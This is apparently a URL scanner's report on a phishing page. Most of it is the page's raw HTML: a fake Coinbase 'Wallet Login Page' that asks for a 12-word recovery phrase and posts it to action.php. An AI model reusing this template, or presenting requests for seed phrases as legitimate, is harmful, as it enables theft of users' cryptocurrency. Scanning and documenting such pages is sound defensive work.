- Scan ID:
- 8398d951-ba1a-408d-938f-9ea8a4662bc4Finished
- Submitted URL:
- https://wv3.io/jfPDDz7zRedirected
- Report Finished:
Links · 0 found
The outgoing links identified from the page
JavaScript Variables · 3 found
Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope
Name | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Console log messages · 0 found
Messages logged to the web console
HTML
The raw HTML body of the page
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wallet Login Page</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 400px;
width: 100%;
text-align: center;
}
.login-logo {
margin-bottom: 20px;
}
.login-logo img {
width: 150px;
}
.phrase-input {
width: calc(100% / 3 - 10px);
padding: 10px;
margin: 5px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 14px;
}
.login-button {
width: 100%;
padding: 10px;
background-color: #007bff;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s ease;
margin-top: 20px;
}
.login-button:hover {
background-color: #0056b3;
}
.disclaimer {
margin-top: 20px;
color: red;
font-weight: bold;
}
form {
display: flex;
flex-wrap: wrap;
justify-content: space-between;
}
</style>
</head>
<body>
<div class="login-container">
<form action="action.php" method="POST">
<input type="text" class="phrase-input" placeholder="Word 1" name="word1" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 2" name="word2" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 3" name="word3" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 4" name="word4" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 5" name="word5" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 6" name="word6" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 7" name="word7" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 8" name="word8" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 9" name="word9" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 10" name="word10" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 11" name="word11" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 12" name="word12" required="" spellcheck="true">
<button type="submit" class="login-button">Verify Wallet</button>
</form>
<div class="disclaimer">Note: You can find your 12-word recovery phrase for your Coinbase Wallet in the Settings menu by selecting Security, then Backups.</div>
</div>
</body></html>